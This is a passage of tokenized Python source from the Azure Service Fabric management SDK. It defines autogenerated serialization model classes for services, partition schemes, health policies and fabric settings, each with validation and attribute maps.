:type receivers: list[str] """<line_sep>_validation={'notification_channel':{'required':<true>} 'receivers':{'required':<true>} }<line_sep>_attribute_map={'notification_channel':{'key':'notificationChannel' 'type':'str'} 'receivers':{'key':'receivers' 'type':'[str]'} }<def_stmt>__init__ self **kwargs<block_start>super(NotificationTarget self).__init__(**kwargs)<line_sep>self.notification_channel=kwargs['notification_channel']<line_sep>self.receivers=kwargs['receivers']<block_end><block_end><class_stmt>OperationListResult(msrest.serialization.Model)<block_start>"""Describes the result of the request to list Service Fabric resource provider operations. Variables are only populated by the server, and will be ignored when sending a request. :param value: List of operations supported by the Service Fabric resource provider. :type value: list[~azure.mgmt.servicefabric.models.OperationResult] :ivar next_link: URL to get the next set of operation list results if there are any. :vartype next_link: str """<line_sep>_validation={'next_link':{'readonly':<true>} }<line_sep>_attribute_map={'value':{'key':'value' 'type':'[OperationResult]'} 'next_link':{'key':'nextLink' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(OperationListResult self).__init__(**kwargs)<line_sep>self.value=kwargs.get('value' <none>)<line_sep>self.next_link=<none><block_end><block_end><class_stmt>OperationResult(msrest.serialization.Model)<block_start>"""Available operation list result. :param name: The name of the operation. :type name: str :param is_data_action: Indicates whether the operation is a data action. :type is_data_action: bool :param display: The object that represents the operation. :type display: ~azure.mgmt.servicefabric.models.AvailableOperationDisplay :param origin: Origin result. :type origin: str :param next_link: The URL to use for getting the next set of results. 
:type next_link: str """<line_sep>_attribute_map={'name':{'key':'name' 'type':'str'} 'is_data_action':{'key':'isDataAction' 'type':'bool'} 'display':{'key':'display' 'type':'AvailableOperationDisplay'} 'origin':{'key':'origin' 'type':'str'} 'next_link':{'key':'nextLink' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(OperationResult self).__init__(**kwargs)<line_sep>self.name=kwargs.get('name' <none>)<line_sep>self.is_data_action=kwargs.get('is_data_action' <none>)<line_sep>self.display=kwargs.get('display' <none>)<line_sep>self.origin=kwargs.get('origin' <none>)<line_sep>self.next_link=kwargs.get('next_link' <none>)<block_end><block_end><class_stmt>ServerCertificateCommonName(msrest.serialization.Model)<block_start>"""Describes the server certificate details using common name. All required parameters must be populated in order to send to Azure. :param certificate_common_name: Required. The common name of the server certificate. :type certificate_common_name: str :param certificate_issuer_thumbprint: Required. The issuer thumbprint of the server certificate. :type certificate_issuer_thumbprint: str """<line_sep>_validation={'certificate_common_name':{'required':<true>} 'certificate_issuer_thumbprint':{'required':<true>} }<line_sep>_attribute_map={'certificate_common_name':{'key':'certificateCommonName' 'type':'str'} 'certificate_issuer_thumbprint':{'key':'certificateIssuerThumbprint' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(ServerCertificateCommonName self).__init__(**kwargs)<line_sep>self.certificate_common_name=kwargs['certificate_common_name']<line_sep>self.certificate_issuer_thumbprint=kwargs['certificate_issuer_thumbprint']<block_end><block_end><class_stmt>ServerCertificateCommonNames(msrest.serialization.Model)<block_start>"""Describes a list of server certificates referenced by common name that are used to secure the cluster. 
:param common_names: The list of server certificates referenced by common name that are used to secure the cluster. :type common_names: list[~azure.mgmt.servicefabric.models.ServerCertificateCommonName] :param x509_store_name: The local certificate store location. Possible values include: "AddressBook", "AuthRoot", "CertificateAuthority", "Disallowed", "My", "Root", "TrustedPeople", "TrustedPublisher". :type x509_store_name: str or ~azure.mgmt.servicefabric.models.StoreName """<line_sep>_attribute_map={'common_names':{'key':'commonNames' 'type':'[ServerCertificateCommonName]'} 'x509_store_name':{'key':'x509StoreName' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(ServerCertificateCommonNames self).__init__(**kwargs)<line_sep>self.common_names=kwargs.get('common_names' <none>)<line_sep>self.x509_store_name=kwargs.get('x509_store_name' <none>)<block_end><block_end><class_stmt>ServiceCorrelationDescription(msrest.serialization.Model)<block_start>"""Creates a particular correlation between services. All required parameters must be populated in order to send to Azure. :param scheme: Required. The ServiceCorrelationScheme which describes the relationship between this service and the service specified via ServiceName. Possible values include: "Invalid", "Affinity", "AlignedAffinity", "NonAlignedAffinity". :type scheme: str or ~azure.mgmt.servicefabric.models.ServiceCorrelationScheme :param service_name: Required. The name of the service that the correlation relationship is established with. 
:type service_name: str """<line_sep>_validation={'scheme':{'required':<true>} 'service_name':{'required':<true>} }<line_sep>_attribute_map={'scheme':{'key':'scheme' 'type':'str'} 'service_name':{'key':'serviceName' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(ServiceCorrelationDescription self).__init__(**kwargs)<line_sep>self.scheme=kwargs['scheme']<line_sep>self.service_name=kwargs['service_name']<block_end><block_end><class_stmt>ServiceLoadMetricDescription(msrest.serialization.Model)<block_start>"""Specifies a metric to load balance a service during runtime. All required parameters must be populated in order to send to Azure. :param name: Required. The name of the metric. If the service chooses to report load during runtime, the load metric name should match the name that is specified in Name exactly. Note that metric names are case sensitive. :type name: str :param weight: The service load metric relative weight, compared to other metrics configured for this service, as a number. Possible values include: "Zero", "Low", "Medium", "High". :type weight: str or ~azure.mgmt.servicefabric.models.ServiceLoadMetricWeight :param primary_default_load: Used only for Stateful services. The default amount of load, as a number, that this service creates for this metric when it is a Primary replica. :type primary_default_load: int :param secondary_default_load: Used only for Stateful services. The default amount of load, as a number, that this service creates for this metric when it is a Secondary replica. :type secondary_default_load: int :param default_load: Used only for Stateless services. The default amount of load, as a number, that this service creates for this metric. 
:type default_load: int """<line_sep>_validation={'name':{'required':<true>} }<line_sep>_attribute_map={'name':{'key':'name' 'type':'str'} 'weight':{'key':'weight' 'type':'str'} 'primary_default_load':{'key':'primaryDefaultLoad' 'type':'int'} 'secondary_default_load':{'key':'secondaryDefaultLoad' 'type':'int'} 'default_load':{'key':'defaultLoad' 'type':'int'} }<def_stmt>__init__ self **kwargs<block_start>super(ServiceLoadMetricDescription self).__init__(**kwargs)<line_sep>self.name=kwargs['name']<line_sep>self.weight=kwargs.get('weight' <none>)<line_sep>self.primary_default_load=kwargs.get('primary_default_load' <none>)<line_sep>self.secondary_default_load=kwargs.get('secondary_default_load' <none>)<line_sep>self.default_load=kwargs.get('default_load' <none>)<block_end><block_end><class_stmt>ServicePlacementPolicyDescription(msrest.serialization.Model)<block_start>"""Describes the policy to be used for placement of a Service Fabric service. You probably want to use the sub-classes and not this class directly. Known sub-classes are: . All required parameters must be populated in order to send to Azure. :param type: Required. The type of placement policy for a service fabric service. Following are the possible values.Constant filled by server. Possible values include: "Invalid", "InvalidDomain", "RequiredDomain", "PreferredPrimaryDomain", "RequiredDomainDistribution", "NonPartiallyPlaceService". :type type: str or ~azure.mgmt.servicefabric.models.ServicePlacementPolicyType """<line_sep>_validation={'type':{'required':<true>} }<line_sep>_attribute_map={'type':{'key':'type' 'type':'str'} }<line_sep>_subtype_map={'type':{}}<def_stmt>__init__ self **kwargs<block_start>super(ServicePlacementPolicyDescription self).__init__(**kwargs)<line_sep>self.type=<none><block_end><block_end># type: Optional[str] <class_stmt>ServiceResource(ProxyResource)<block_start>"""The service resource. Variables are only populated by the server, and will be ignored when sending a request. 
:ivar id: Azure resource identifier. :vartype id: str :ivar name: Azure resource name. :vartype name: str :ivar type: Azure resource type. :vartype type: str :param location: It will be deprecated in New API, resource location depends on the parent resource. :type location: str :param tags: A set of tags. Azure resource tags. :type tags: dict[str, str] :ivar etag: Azure resource etag. :vartype etag: str :ivar system_data: Metadata pertaining to creation and last modification of the resource. :vartype system_data: ~azure.mgmt.servicefabric.models.SystemData :param placement_constraints: The placement constraints as a string. Placement constraints are boolean expressions on node properties and allow for restricting a service to particular nodes based on the service requirements. For example, to place a service on nodes where NodeType is blue specify the following: "NodeColor == blue)". :type placement_constraints: str :param correlation_scheme: A list that describes the correlation of the service with other services. :type correlation_scheme: list[~azure.mgmt.servicefabric.models.ServiceCorrelationDescription] :param service_load_metrics: The service load metrics is given as an array of ServiceLoadMetricDescription objects. :type service_load_metrics: list[~azure.mgmt.servicefabric.models.ServiceLoadMetricDescription] :param service_placement_policies: A list that describes the correlation of the service with other services. :type service_placement_policies: list[~azure.mgmt.servicefabric.models.ServicePlacementPolicyDescription] :param default_move_cost: Specifies the move cost for the service. Possible values include: "Zero", "Low", "Medium", "High". :type default_move_cost: str or ~azure.mgmt.servicefabric.models.MoveCost :ivar provisioning_state: The current deployment or provisioning state, which only appears in the response. :vartype provisioning_state: str :param service_kind: The kind of service (Stateless or Stateful).Constant filled by server. 
Possible values include: "Invalid", "Stateless", "Stateful". :type service_kind: str or ~azure.mgmt.servicefabric.models.ServiceKind :param service_type_name: The name of the service type. :type service_type_name: str :param partition_description: Describes how the service is partitioned. :type partition_description: ~azure.mgmt.servicefabric.models.PartitionSchemeDescription :param service_package_activation_mode: The activation Mode of the service package. Possible values include: "SharedProcess", "ExclusiveProcess". :type service_package_activation_mode: str or ~azure.mgmt.servicefabric.models.ArmServicePackageActivationMode :param service_dns_name: Dns name used for the service. If this is specified, then the service can be accessed via its DNS name instead of service name. :type service_dns_name: str """<line_sep>_validation={'id':{'readonly':<true>} 'name':{'readonly':<true>} 'type':{'readonly':<true>} 'etag':{'readonly':<true>} 'system_data':{'readonly':<true>} 'provisioning_state':{'readonly':<true>} }<line_sep>_attribute_map={'id':{'key':'id' 'type':'str'} 'name':{'key':'name' 'type':'str'} 'type':{'key':'type' 'type':'str'} 'location':{'key':'location' 'type':'str'} 'tags':{'key':'tags' 'type':'{str}'} 'etag':{'key':'etag' 'type':'str'} 'system_data':{'key':'systemData' 'type':'SystemData'} 'placement_constraints':{'key':'properties.placementConstraints' 'type':'str'} 'correlation_scheme':{'key':'properties.correlationScheme' 'type':'[ServiceCorrelationDescription]'} 'service_load_metrics':{'key':'properties.serviceLoadMetrics' 'type':'[ServiceLoadMetricDescription]'} 'service_placement_policies':{'key':'properties.servicePlacementPolicies' 'type':'[ServicePlacementPolicyDescription]'} 'default_move_cost':{'key':'properties.defaultMoveCost' 'type':'str'} 'provisioning_state':{'key':'properties.provisioningState' 'type':'str'} 'service_kind':{'key':'properties.serviceKind' 'type':'str'} 'service_type_name':{'key':'properties.serviceTypeName' 'type':'str'} 
'partition_description':{'key':'properties.partitionDescription' 'type':'PartitionSchemeDescription'} 'service_package_activation_mode':{'key':'properties.servicePackageActivationMode' 'type':'str'} 'service_dns_name':{'key':'properties.serviceDnsName' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(ServiceResource self).__init__(**kwargs)<line_sep>self.placement_constraints=kwargs.get('placement_constraints' <none>)<line_sep>self.correlation_scheme=kwargs.get('correlation_scheme' <none>)<line_sep>self.service_load_metrics=kwargs.get('service_load_metrics' <none>)<line_sep>self.service_placement_policies=kwargs.get('service_placement_policies' <none>)<line_sep>self.default_move_cost=kwargs.get('default_move_cost' <none>)<line_sep>self.provisioning_state=<none><line_sep>self.service_kind=<none># type: Optional[str] self.service_type_name=kwargs.get('service_type_name' <none>)<line_sep>self.partition_description=kwargs.get('partition_description' <none>)<line_sep>self.service_package_activation_mode=kwargs.get('service_package_activation_mode' <none>)<line_sep>self.service_dns_name=kwargs.get('service_dns_name' <none>)<block_end><block_end><class_stmt>ServiceResourceList(msrest.serialization.Model)<block_start>"""The list of service resources. Variables are only populated by the server, and will be ignored when sending a request. :param value: :type value: list[~azure.mgmt.servicefabric.models.ServiceResource] :ivar next_link: URL to get the next set of service list results if there are any. 
:vartype next_link: str """<line_sep>_validation={'next_link':{'readonly':<true>} }<line_sep>_attribute_map={'value':{'key':'value' 'type':'[ServiceResource]'} 'next_link':{'key':'nextLink' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(ServiceResourceList self).__init__(**kwargs)<line_sep>self.value=kwargs.get('value' <none>)<line_sep>self.next_link=<none><block_end><block_end><class_stmt>ServiceResourcePropertiesBase(msrest.serialization.Model)<block_start>"""The common service resource properties. :param placement_constraints: The placement constraints as a string. Placement constraints are boolean expressions on node properties and allow for restricting a service to particular nodes based on the service requirements. For example, to place a service on nodes where NodeType is blue specify the following: "NodeColor == blue)". :type placement_constraints: str :param correlation_scheme: A list that describes the correlation of the service with other services. :type correlation_scheme: list[~azure.mgmt.servicefabric.models.ServiceCorrelationDescription] :param service_load_metrics: The service load metrics is given as an array of ServiceLoadMetricDescription objects. :type service_load_metrics: list[~azure.mgmt.servicefabric.models.ServiceLoadMetricDescription] :param service_placement_policies: A list that describes the correlation of the service with other services. :type service_placement_policies: list[~azure.mgmt.servicefabric.models.ServicePlacementPolicyDescription] :param default_move_cost: Specifies the move cost for the service. Possible values include: "Zero", "Low", "Medium", "High". 
:type default_move_cost: str or ~azure.mgmt.servicefabric.models.MoveCost """<line_sep>_attribute_map={'placement_constraints':{'key':'placementConstraints' 'type':'str'} 'correlation_scheme':{'key':'correlationScheme' 'type':'[ServiceCorrelationDescription]'} 'service_load_metrics':{'key':'serviceLoadMetrics' 'type':'[ServiceLoadMetricDescription]'} 'service_placement_policies':{'key':'servicePlacementPolicies' 'type':'[ServicePlacementPolicyDescription]'} 'default_move_cost':{'key':'defaultMoveCost' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(ServiceResourcePropertiesBase self).__init__(**kwargs)<line_sep>self.placement_constraints=kwargs.get('placement_constraints' <none>)<line_sep>self.correlation_scheme=kwargs.get('correlation_scheme' <none>)<line_sep>self.service_load_metrics=kwargs.get('service_load_metrics' <none>)<line_sep>self.service_placement_policies=kwargs.get('service_placement_policies' <none>)<line_sep>self.default_move_cost=kwargs.get('default_move_cost' <none>)<block_end><block_end><class_stmt>ServiceResourceProperties(ServiceResourcePropertiesBase)<block_start>"""The service resource properties. You probably want to use the sub-classes and not this class directly. Known sub-classes are: StatefulServiceProperties, StatelessServiceProperties. Variables are only populated by the server, and will be ignored when sending a request. All required parameters must be populated in order to send to Azure. :param placement_constraints: The placement constraints as a string. Placement constraints are boolean expressions on node properties and allow for restricting a service to particular nodes based on the service requirements. For example, to place a service on nodes where NodeType is blue specify the following: "NodeColor == blue)". :type placement_constraints: str :param correlation_scheme: A list that describes the correlation of the service with other services. 
class ServiceResourceProperties(ServiceResourcePropertiesBase):
    """The service resource properties.

    You probably want to use the sub-classes and not this class directly. Known
    sub-classes are: StatefulServiceProperties, StatelessServiceProperties.

    Variables are only populated by the server, and will be ignored when sending a request.

    All required parameters must be populated in order to send to Azure.

    :param placement_constraints: The placement constraints as a string.
    :type placement_constraints: str
    :param correlation_scheme: A list that describes the correlation of the service with other
     services.
    :type correlation_scheme: list[~azure.mgmt.servicefabric.models.ServiceCorrelationDescription]
    :param service_load_metrics: The service load metrics is given as an array of
     ServiceLoadMetricDescription objects.
    :type service_load_metrics: list[~azure.mgmt.servicefabric.models.ServiceLoadMetricDescription]
    :param service_placement_policies: A list that describes the correlation of the service with
     other services.
    :type service_placement_policies:
     list[~azure.mgmt.servicefabric.models.ServicePlacementPolicyDescription]
    :param default_move_cost: Specifies the move cost for the service. Possible values include:
     "Zero", "Low", "Medium", "High".
    :type default_move_cost: str or ~azure.mgmt.servicefabric.models.MoveCost
    :ivar provisioning_state: The current deployment or provisioning state, which only appears
     in the response.
    :vartype provisioning_state: str
    :param service_kind: Required. The kind of service (Stateless or Stateful). Constant filled
     by server. Possible values include: "Invalid", "Stateless", "Stateful".
    :type service_kind: str or ~azure.mgmt.servicefabric.models.ServiceKind
    :param service_type_name: The name of the service type.
    :type service_type_name: str
    :param partition_description: Describes how the service is partitioned.
    :type partition_description: ~azure.mgmt.servicefabric.models.PartitionSchemeDescription
    :param service_package_activation_mode: The activation Mode of the service package. Possible
     values include: "SharedProcess", "ExclusiveProcess".
    :type service_package_activation_mode: str or
     ~azure.mgmt.servicefabric.models.ArmServicePackageActivationMode
    :param service_dns_name: Dns name used for the service. If this is specified, then the
     service can be accessed via its DNS name instead of service name.
    :type service_dns_name: str
    """

    _validation = {
        'provisioning_state': {'readonly': True},
        'service_kind': {'required': True},
    }

    _attribute_map = {
        'placement_constraints': {'key': 'placementConstraints', 'type': 'str'},
        'correlation_scheme': {'key': 'correlationScheme', 'type': '[ServiceCorrelationDescription]'},
        'service_load_metrics': {'key': 'serviceLoadMetrics', 'type': '[ServiceLoadMetricDescription]'},
        'service_placement_policies': {'key': 'servicePlacementPolicies', 'type': '[ServicePlacementPolicyDescription]'},
        'default_move_cost': {'key': 'defaultMoveCost', 'type': 'str'},
        'provisioning_state': {'key': 'provisioningState', 'type': 'str'},
        'service_kind': {'key': 'serviceKind', 'type': 'str'},
        'service_type_name': {'key': 'serviceTypeName', 'type': 'str'},
        'partition_description': {'key': 'partitionDescription', 'type': 'PartitionSchemeDescription'},
        'service_package_activation_mode': {'key': 'servicePackageActivationMode', 'type': 'str'},
        'service_dns_name': {'key': 'serviceDnsName', 'type': 'str'},
    }

    # Polymorphic dispatch: the serialized 'serviceKind' selects the concrete model.
    _subtype_map = {
        'service_kind': {'Stateful': 'StatefulServiceProperties', 'Stateless': 'StatelessServiceProperties'}
    }

    def __init__(self, **kwargs):
        super(ServiceResourceProperties, self).__init__(**kwargs)
        # Server-populated; never sent in requests.
        self.provisioning_state = None
        # Discriminator value identifying this (abstract) type.
        self.service_kind = 'ServiceResourceProperties'  # type: str
        self.service_type_name = kwargs.get('service_type_name')
        self.partition_description = kwargs.get('partition_description')
        self.service_package_activation_mode = kwargs.get('service_package_activation_mode')
        self.service_dns_name = kwargs.get('service_dns_name')
class ServiceResourceUpdate(ProxyResource):
    """The service resource for patch operations.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar id: Azure resource identifier.
    :vartype id: str
    :ivar name: Azure resource name.
    :vartype name: str
    :ivar type: Azure resource type.
    :vartype type: str
    :param location: It will be deprecated in New API, resource location depends on the parent
     resource.
    :type location: str
    :param tags: A set of tags. Azure resource tags.
    :type tags: dict[str, str]
    :ivar etag: Azure resource etag.
    :vartype etag: str
    :ivar system_data: Metadata pertaining to creation and last modification of the resource.
    :vartype system_data: ~azure.mgmt.servicefabric.models.SystemData
    :param placement_constraints: The placement constraints as a string.
    :type placement_constraints: str
    :param correlation_scheme: A list that describes the correlation of the service with other
     services.
    :type correlation_scheme: list[~azure.mgmt.servicefabric.models.ServiceCorrelationDescription]
    :param service_load_metrics: The service load metrics is given as an array of
     ServiceLoadMetricDescription objects.
    :type service_load_metrics: list[~azure.mgmt.servicefabric.models.ServiceLoadMetricDescription]
    :param service_placement_policies: A list that describes the correlation of the service with
     other services.
    :type service_placement_policies:
     list[~azure.mgmt.servicefabric.models.ServicePlacementPolicyDescription]
    :param default_move_cost: Specifies the move cost for the service. Possible values include:
     "Zero", "Low", "Medium", "High".
    :type default_move_cost: str or ~azure.mgmt.servicefabric.models.MoveCost
    :param service_kind: The kind of service (Stateless or Stateful). Constant filled by server.
     Possible values include: "Invalid", "Stateless", "Stateful".
    :type service_kind: str or ~azure.mgmt.servicefabric.models.ServiceKind
    """

    _validation = {
        'id': {'readonly': True},
        'name': {'readonly': True},
        'type': {'readonly': True},
        'etag': {'readonly': True},
        'system_data': {'readonly': True},
    }

    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
        'location': {'key': 'location', 'type': 'str'},
        'tags': {'key': 'tags', 'type': '{str}'},
        'etag': {'key': 'etag', 'type': 'str'},
        'system_data': {'key': 'systemData', 'type': 'SystemData'},
        'placement_constraints': {'key': 'properties.placementConstraints', 'type': 'str'},
        'correlation_scheme': {'key': 'properties.correlationScheme', 'type': '[ServiceCorrelationDescription]'},
        'service_load_metrics': {'key': 'properties.serviceLoadMetrics', 'type': '[ServiceLoadMetricDescription]'},
        'service_placement_policies': {'key': 'properties.servicePlacementPolicies', 'type': '[ServicePlacementPolicyDescription]'},
        'default_move_cost': {'key': 'properties.defaultMoveCost', 'type': 'str'},
        'service_kind': {'key': 'properties.serviceKind', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(ServiceResourceUpdate, self).__init__(**kwargs)
        self.placement_constraints = kwargs.get('placement_constraints')
        self.correlation_scheme = kwargs.get('correlation_scheme')
        self.service_load_metrics = kwargs.get('service_load_metrics')
        self.service_placement_policies = kwargs.get('service_placement_policies')
        self.default_move_cost = kwargs.get('default_move_cost')
        # Constant filled by the server for patch payloads.
        self.service_kind = None  # type: Optional[str]
class ServiceResourceUpdateProperties(ServiceResourcePropertiesBase):
    """The service resource properties for patch operations.

    You probably want to use the sub-classes and not this class directly. Known
    sub-classes are: StatefulServiceUpdateProperties, StatelessServiceUpdateProperties.

    All required parameters must be populated in order to send to Azure.

    :param placement_constraints: The placement constraints as a string.
    :type placement_constraints: str
    :param correlation_scheme: A list that describes the correlation of the service with other
     services.
    :type correlation_scheme: list[~azure.mgmt.servicefabric.models.ServiceCorrelationDescription]
    :param service_load_metrics: The service load metrics is given as an array of
     ServiceLoadMetricDescription objects.
    :type service_load_metrics: list[~azure.mgmt.servicefabric.models.ServiceLoadMetricDescription]
    :param service_placement_policies: A list that describes the correlation of the service with
     other services.
    :type service_placement_policies:
     list[~azure.mgmt.servicefabric.models.ServicePlacementPolicyDescription]
    :param default_move_cost: Specifies the move cost for the service. Possible values include:
     "Zero", "Low", "Medium", "High".
    :type default_move_cost: str or ~azure.mgmt.servicefabric.models.MoveCost
    :param service_kind: Required. The kind of service (Stateless or Stateful). Constant filled
     by server. Possible values include: "Invalid", "Stateless", "Stateful".
    :type service_kind: str or ~azure.mgmt.servicefabric.models.ServiceKind
    """

    _validation = {
        'service_kind': {'required': True},
    }

    _attribute_map = {
        'placement_constraints': {'key': 'placementConstraints', 'type': 'str'},
        'correlation_scheme': {'key': 'correlationScheme', 'type': '[ServiceCorrelationDescription]'},
        'service_load_metrics': {'key': 'serviceLoadMetrics', 'type': '[ServiceLoadMetricDescription]'},
        'service_placement_policies': {'key': 'servicePlacementPolicies', 'type': '[ServicePlacementPolicyDescription]'},
        'default_move_cost': {'key': 'defaultMoveCost', 'type': 'str'},
        'service_kind': {'key': 'serviceKind', 'type': 'str'},
    }

    # Polymorphic dispatch on the serialized 'serviceKind' discriminator.
    _subtype_map = {
        'service_kind': {'Stateful': 'StatefulServiceUpdateProperties', 'Stateless': 'StatelessServiceUpdateProperties'}
    }

    def __init__(self, **kwargs):
        super(ServiceResourceUpdateProperties, self).__init__(**kwargs)
        self.service_kind = 'ServiceResourceUpdateProperties'  # type: str
class ServiceTypeDeltaHealthPolicy(msrest.serialization.Model):
    """Represents the delta health policy used to evaluate the health of services belonging to a
    service type when upgrading the cluster.

    :param max_percent_delta_unhealthy_services: The maximum allowed percentage of services
     health degradation allowed during cluster upgrades. The delta is measured between the state
     of the services at the beginning of upgrade and the state of the services at the time of
     the health evaluation. The check is performed after every upgrade domain upgrade completion
     to make sure the global state of the cluster is within tolerated limits.
    :type max_percent_delta_unhealthy_services: int
    """

    _validation = {
        'max_percent_delta_unhealthy_services': {'maximum': 100, 'minimum': 0},
    }

    _attribute_map = {
        'max_percent_delta_unhealthy_services': {'key': 'maxPercentDeltaUnhealthyServices', 'type': 'int'},
    }

    def __init__(self, **kwargs):
        super(ServiceTypeDeltaHealthPolicy, self).__init__(**kwargs)
        # NOTE: defaults to 0 (not None) when the caller omits the value.
        self.max_percent_delta_unhealthy_services = kwargs.get('max_percent_delta_unhealthy_services', 0)


class ServiceTypeHealthPolicy(msrest.serialization.Model):
    """Represents the health policy used to evaluate the health of services belonging to a
    service type.

    :param max_percent_unhealthy_services: The maximum percentage of services allowed to be
     unhealthy before your application is considered in error.
    :type max_percent_unhealthy_services: int
    """

    _validation = {
        'max_percent_unhealthy_services': {'maximum': 100, 'minimum': 0},
    }

    _attribute_map = {
        'max_percent_unhealthy_services': {'key': 'maxPercentUnhealthyServices', 'type': 'int'},
    }

    def __init__(self, **kwargs):
        super(ServiceTypeHealthPolicy, self).__init__(**kwargs)
        # NOTE: defaults to 0 (not None) when the caller omits the value.
        self.max_percent_unhealthy_services = kwargs.get('max_percent_unhealthy_services', 0)
class SettingsParameterDescription(msrest.serialization.Model):
    """Describes a parameter in fabric settings of the cluster.

    All required parameters must be populated in order to send to Azure.

    :param name: Required. The parameter name of fabric setting.
    :type name: str
    :param value: Required. The parameter value of fabric setting.
    :type value: str
    """

    _validation = {
        'name': {'required': True},
        'value': {'required': True},
    }

    _attribute_map = {
        'name': {'key': 'name', 'type': 'str'},
        'value': {'key': 'value', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(SettingsParameterDescription, self).__init__(**kwargs)
        # Required: raises KeyError if missing, matching msrest's required-field contract.
        self.name = kwargs['name']
        self.value = kwargs['value']


class SettingsSectionDescription(msrest.serialization.Model):
    """Describes a section in the fabric settings of the cluster.

    All required parameters must be populated in order to send to Azure.

    :param name: Required. The section name of the fabric settings.
    :type name: str
    :param parameters: Required. The collection of parameters in the section.
    :type parameters: list[~azure.mgmt.servicefabric.models.SettingsParameterDescription]
    """

    _validation = {
        'name': {'required': True},
        'parameters': {'required': True},
    }

    _attribute_map = {
        'name': {'key': 'name', 'type': 'str'},
        'parameters': {'key': 'parameters', 'type': '[SettingsParameterDescription]'},
    }

    def __init__(self, **kwargs):
        super(SettingsSectionDescription, self).__init__(**kwargs)
        # Required: raises KeyError if missing, matching msrest's required-field contract.
        self.name = kwargs['name']
        self.parameters = kwargs['parameters']
class SingletonPartitionSchemeDescription(PartitionSchemeDescription):
    """Describes the partition scheme of a singleton-partitioned, or non-partitioned, service.

    All required parameters must be populated in order to send to Azure.

    :param partition_scheme: Required. Specifies how the service is partitioned. Constant filled
     by server. Possible values include: "Invalid", "Singleton", "UniformInt64Range", "Named".
    :type partition_scheme: str or ~azure.mgmt.servicefabric.models.PartitionScheme
    """

    _validation = {
        'partition_scheme': {'required': True},
    }

    _attribute_map = {
        'partition_scheme': {'key': 'partitionScheme', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super(SingletonPartitionSchemeDescription, self).__init__(**kwargs)
        # Discriminator constant for this concrete partition scheme.
        self.partition_scheme = 'Singleton'  # type: str
class StatefulServiceProperties(ServiceResourceProperties):
    """The properties of a stateful service resource.

    Variables are only populated by the server, and will be ignored when sending a request.

    All required parameters must be populated in order to send to Azure.

    :param placement_constraints: The placement constraints as a string.
    :type placement_constraints: str
    :param correlation_scheme: A list that describes the correlation of the service with other
     services.
    :type correlation_scheme: list[~azure.mgmt.servicefabric.models.ServiceCorrelationDescription]
    :param service_load_metrics: The service load metrics is given as an array of
     ServiceLoadMetricDescription objects.
    :type service_load_metrics: list[~azure.mgmt.servicefabric.models.ServiceLoadMetricDescription]
    :param service_placement_policies: A list that describes the correlation of the service with
     other services.
    :type service_placement_policies:
     list[~azure.mgmt.servicefabric.models.ServicePlacementPolicyDescription]
    :param default_move_cost: Specifies the move cost for the service. Possible values include:
     "Zero", "Low", "Medium", "High".
    :type default_move_cost: str or ~azure.mgmt.servicefabric.models.MoveCost
    :ivar provisioning_state: The current deployment or provisioning state, which only appears
     in the response.
    :vartype provisioning_state: str
    :param service_kind: Required. The kind of service (Stateless or Stateful). Constant filled
     by server. Possible values include: "Invalid", "Stateless", "Stateful".
    :type service_kind: str or ~azure.mgmt.servicefabric.models.ServiceKind
    :param service_type_name: The name of the service type.
    :type service_type_name: str
    :param partition_description: Describes how the service is partitioned.
    :type partition_description: ~azure.mgmt.servicefabric.models.PartitionSchemeDescription
    :param service_package_activation_mode: The activation Mode of the service package. Possible
     values include: "SharedProcess", "ExclusiveProcess".
    :type service_package_activation_mode: str or
     ~azure.mgmt.servicefabric.models.ArmServicePackageActivationMode
    :param service_dns_name: Dns name used for the service. If this is specified, then the
     service can be accessed via its DNS name instead of service name.
    :type service_dns_name: str
    :param has_persisted_state: A flag indicating whether this is a persistent service which
     stores states on the local disk. If it is then the value of this property is true, if not
     it is false.
    :type has_persisted_state: bool
    :param target_replica_set_size: The target replica set size as a number.
    :type target_replica_set_size: int
    :param min_replica_set_size: The minimum replica set size as a number.
    :type min_replica_set_size: int
    :param replica_restart_wait_duration: The duration between when a replica goes down and when
     a new replica is created, represented in ISO 8601 format (hh:mm:ss.s).
    :type replica_restart_wait_duration: ~datetime.datetime
    :param quorum_loss_wait_duration: The maximum duration for which a partition is allowed to
     be in a state of quorum loss, represented in ISO 8601 format (hh:mm:ss.s).
    :type quorum_loss_wait_duration: ~datetime.datetime
    :param stand_by_replica_keep_duration: The definition on how long StandBy replicas should be
     maintained before being removed, represented in ISO 8601 format (hh:mm:ss.s).
    :type stand_by_replica_keep_duration: ~datetime.datetime
    """

    _validation = {
        'provisioning_state': {'readonly': True},
        'service_kind': {'required': True},
        'target_replica_set_size': {'minimum': 1},
        'min_replica_set_size': {'minimum': 1},
    }

    _attribute_map = {
        'placement_constraints': {'key': 'placementConstraints', 'type': 'str'},
        'correlation_scheme': {'key': 'correlationScheme', 'type': '[ServiceCorrelationDescription]'},
        'service_load_metrics': {'key': 'serviceLoadMetrics', 'type': '[ServiceLoadMetricDescription]'},
        'service_placement_policies': {'key': 'servicePlacementPolicies', 'type': '[ServicePlacementPolicyDescription]'},
        'default_move_cost': {'key': 'defaultMoveCost', 'type': 'str'},
        'provisioning_state': {'key': 'provisioningState', 'type': 'str'},
        'service_kind': {'key': 'serviceKind', 'type': 'str'},
        'service_type_name': {'key': 'serviceTypeName', 'type': 'str'},
        'partition_description': {'key': 'partitionDescription', 'type': 'PartitionSchemeDescription'},
        'service_package_activation_mode': {'key': 'servicePackageActivationMode', 'type': 'str'},
        'service_dns_name': {'key': 'serviceDnsName', 'type': 'str'},
        'has_persisted_state': {'key': 'hasPersistedState', 'type': 'bool'},
        'target_replica_set_size': {'key': 'targetReplicaSetSize', 'type': 'int'},
        'min_replica_set_size': {'key': 'minReplicaSetSize', 'type': 'int'},
